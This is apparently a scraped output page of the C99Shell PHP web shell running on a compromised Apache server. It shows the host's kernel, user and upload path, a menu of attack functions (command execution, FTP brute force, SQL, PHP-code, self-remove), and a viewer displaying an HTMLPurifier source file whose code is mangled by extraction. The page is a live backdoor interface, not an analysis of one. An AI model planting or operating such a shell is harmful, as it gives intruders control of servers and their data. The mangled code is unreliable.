!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/ezyang/htmlpurifier/library/HTMLPurifier/AttrDef/HTML/   drwxr-xr-x
Free 13.25 GB of 57.97 GB (22.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ID.php (3.13 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Validates the HTML attribute ID.
 * @warning Even though this is the id processor, it
 *          will ignore the directive Attr:IDBlacklist, since it will only
 *          go according to the ID accumulator. Since the accumulator is
 *          automatically generated, it will have already absorbed the
 *          blacklist. If you're hacking around, make sure you use load()!
 */

class HTMLPurifier_AttrDef_HTML_ID extends HTMLPurifier_AttrDef
{

    
// selector is NOT a valid thing to use for IDREFs, because IDREFs
    // *must* target IDs that exist, whereas selector #ids do not.

    /**
     * Determines whether or not we're validating an ID in a CSS
     * selector context.
     * @type bool
     */
    
protected $selector;

    
/**
     * @param bool $selector
     */
    
public function __construct($selector false)
    {
        
$this->selector $selector;
    }

    
/**
     * @param string $id
     * @param HTMLPurifier_Config $config
     * @param HTMLPurifier_Context $context
     * @return bool|string
     */
    
public function validate($id$config$context)
    {
        if (!
$this->selector && !$config->get('Attr.EnableID')) {
            return 
false;
        }

        
$id trim($id); // trim it first

        
if ($id === '') {
            return 
false;
        }

        
$prefix $config->get('Attr.IDPrefix');
        if (
$prefix !== '') {
            
$prefix .= $config->get('Attr.IDPrefixLocal');
            
// prevent re-appending the prefix
            
if (strpos($id$prefix) !== 0) {
                
$id $prefix $id;
            }
        } elseif (
$config->get('Attr.IDPrefixLocal') !== '') {
            
trigger_error(
                
'%Attr.IDPrefixLocal cannot be used unless ' .
                
'%Attr.IDPrefix is set',
                
E_USER_WARNING
            
);
        }

        if (!
$this->selector) {
            
$id_accumulator =& $context->get('IDAccumulator');
            if (isset(
$id_accumulator->ids[$id])) {
                return 
false;
            }
        }

        
// we purposely avoid using regex, hopefully this is faster

        
if ($config->get('Attr.ID.HTML5') === true) {
            if (
preg_match('/[\t\n\x0b\x0c ]/'$id)) {
                return 
false;
            }
        } else {
            if (
ctype_alpha($id)) {
                
// OK
            
} else {
                if (!
ctype_alpha(@$id[0])) {
                    return 
false;
                }
                
// primitive style of regexps, I suppose
                
$trim trim(
                    
$id,
                    
'A..Za..z0..9:-._'
                
);
                if (
$trim !== '') {
                    return 
false;
                }
            }
        }

        
$regexp $config->get('Attr.IDBlacklistRegexp');
        if (
$regexp && preg_match($regexp$id)) {
            return 
false;
        }

        if (!
$this->selector) {
            
$id_accumulator->add($id);
        }

        
// if no change was made to the ID, return the result
        // else, return the new id if stripping whitespace made it
        //     valid, or return false.
        
return $id;
    }
}

// vim: et sw=4 sts=4

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--